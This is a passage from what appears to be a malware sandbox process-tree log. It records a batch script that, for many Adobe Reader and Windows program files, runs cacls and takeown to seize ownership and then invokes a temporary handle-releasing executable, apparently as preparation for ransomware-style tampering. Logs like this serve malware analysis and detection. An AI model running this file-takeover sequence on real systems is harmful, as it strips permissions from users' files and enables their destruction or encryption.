    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    PID:236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:1304
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:1720
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      PID:336
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:684
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  PID:596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      PID:224
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1332
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:1304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:828
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:1824
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui""
  2⤵
  PID:792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:684
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""
  2⤵
  PID:1240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:1120
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:884
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:1284
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui""
  2⤵
  PID:336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:964
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\Journal.exe""
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Journal.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Journal.exe" -nobanner
    3⤵
    PID:664
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Journal.exe" -nobanner
      4⤵
      PID:236
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Seyes.jtp" -nobanner
    3⤵
    PID:300
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Seyes.jtp" -nobanner
      4⤵
      PID:1072
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui""
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:340
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1064
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:1284
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  PID:796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:996
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:556
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    - Modifies file permissions
    PID:1204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:1028
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:596
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:1352
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:2040
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:336
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:616
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:1844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    - Modifies file permissions
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:1156
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:1616
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:1672
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:792
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:228
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:1176
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
